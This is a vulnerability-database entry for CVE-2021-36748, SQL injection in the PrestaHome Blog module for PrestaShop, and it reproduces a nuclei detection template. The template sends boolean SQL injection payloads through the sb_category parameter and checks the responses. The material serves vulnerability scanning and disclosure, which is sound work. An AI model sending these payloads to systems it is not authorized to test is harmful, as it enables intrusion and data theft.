Lucene search
K

PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 52 Views

PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-36748
27 Apr 202309:58
circl
CNNVD
Prestashop SQL注入漏洞
20 Aug 202100:00
cnnvd
CVE
CVE-2021-36748
20 Aug 202117:30
cve
Cvelist
CVE-2021-36748
20 Aug 202117:30
cvelist
Dsquare
Prestashop ph_simpleblog SQL Injection
25 Sep 202100:00
dsquare
NVD
CVE-2021-36748
20 Aug 202118:15
nvd
Prion
Sql injection
20 Aug 202118:15
prion
RedhatCVE
CVE-2021-36748
22 May 202519:59
redhatcve
id: CVE-2021-36748

info:
  name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection
  author: whoever
  severity: high
  description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Upgrade to PrestaShop version 1.7.8 or later, or apply the provided patch to fix the SQL Injection vulnerability.
  reference:
    - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/
    - https://alysum5.promokit.eu/promokit/documentation/blog/
    - https://blog.sorcery.ie
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36748
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-36748
    cwe-id: CWE-89
    epss-score: 0.14837
    epss-percentile: 0.96271
    cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:prestashop:*:*
  metadata:
    max-request: 2
    vendor: prestahome
    product: blog
    framework: prestashop
  tags: cve2021,cve,prestashop,prestahome,sqli,cms,vuln

http:
  - raw:
      - |
        GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200"
          - "status_code_2 == 404"
          - 'contains(body_1, "prestashop")'
          - "contains(tolower(header_2), 'index.php?controller=404')"
          - "len(body_2) == 0"
        condition: and
# digest: 4b0a00483046022100a18eb2e74279f39ca035aa07bc69448deabf49f2cb159e21b0b11bd67e0913a2022100966f45feb7854eabff19a3e16050bf4da1cdb2be73fccd81490b6c6131bbfd18:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.14837
52